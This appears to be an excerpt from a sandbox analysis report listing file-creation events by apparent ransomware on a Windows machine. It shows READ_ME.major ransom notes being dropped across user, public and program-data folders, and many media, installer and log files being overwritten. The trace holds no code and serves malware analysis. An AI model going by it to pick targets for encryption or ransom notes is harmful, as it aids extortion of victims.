1 | |
| Create | \Users\FD1HVy\Favorites\Bing.url | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Links\OneDrive.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Links\Downloads.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Links\Desktop.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Links\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\CJCEOTnU\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\HFGXh7wtD7-UGQ8Fgf\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\rai3Ivo\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\SIFlnPdoC-GGQ\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\_g9Q9vc.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\z5CR7h5_U.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\uv8e.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\lWaPt4uX8vu3_v5.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\J-wG9pFE4WWo.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\8ON0Xb4CPpIa.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\78gD k.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\3i3wn RapYG-Uaf.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\OneDrive\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Camera Roll\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Saved Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\zlyGqa755DQtGy.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\yX_-bWBg.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\ypZ6 86QYL-.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\XDXto.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\wyBDIM.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\ULudUyN.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\T_Uksl3tkzyzZ0KXQj.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\tnMrQ F4q2YGrF.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\s1kxL5OunrcXaw.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\rMNu_aSp1JkhZR_.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\rMEczP-gjZm14XX.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\rFUsfA-MWT.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\QzcX.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\qBj3Gs-f.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Pdo cOU.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\P30d2y0Jh1-.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\npGXzodWp02NsTr.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\lQfq5RF5oD CIf42xlmq.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\LhOW8Pwt.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\kqXlzd8LIoC2.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\KP0u84bse5bC4ojl.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\IE7O79Tg8zUu.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\HuwmknDJRqi.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\goFLFaLl_iq1NF.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\gO0-t4iZkLHjvVQbd6j.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\gdRt_WCHPsCtQ.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Gdcr9kY5tD.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\GC-hRBguzaXVSAOa.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\gbYh3XzG4z 9S.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\FGjN.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\ffJL5Y.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\dWXiA31qMmQxJZ8.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\DkaDJKJkiLuj.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\dfa -XDcno_TAnsh.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\d2 hDM8KirVN.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\aOWokbg73cw-ff_OHj.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\9ycf8164-1A.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\3b8zhwJ8f88GMvoUy.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Saved Games\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Searches\Indexed Locations.search-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Searches\Everywhere.search-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Searches\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\STyJ88lyvSUA.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\nbF5fUkJ1ZUu3He.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\diO1.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\BRqP.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\AccountPictures\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Desktop\Mozilla Firefox.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Desktop\Google Chrome.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Desktop\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Desktop\Acrobat Reader DC.lnk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Documents\My Music\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Documents\My Pictures\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Documents\My Videos\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Documents\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Downloads\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Libraries\RecordedTV.library-ms | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Libraries\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Music\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Pictures\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\Videos\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\NXQuery.sys | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\nxquery.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\nxquery.cat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\hwexclude.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\hwcompat.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\amd64\BiosBlocks.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\NXQuery.sys | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\nxquery.inf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\nxquery.cat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\hwexclude.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\hwcompat.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\i386\BiosBlocks.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\Microsoft.WinJS\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\pass.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\NoNetworkConnection.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\marketing.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\lock.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\loading.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\GetStartedHoverOver.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\GetStarted.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\eula.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default_oobe.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default_oobe.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default_eos.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default_eos.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\default.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\bullet.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\bluelogo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\block.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Adobe\ARM\Reader_15.007.20033\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Adobe\ARM\Reader_15.023.20070\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Adobe\ARM\S\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Microsoft OneDrive\setup\refcount.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\.oracle_jre_usage\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\installcache_x64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\javapath\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\javapath_target_474984\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\vcredist_x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\VC_redist.x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOPrivate\UpdateStore\UpdateCspStore.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateUx.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateUx.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.028.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\USOShared\Logs\UpdateSessionOrchestration.027.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
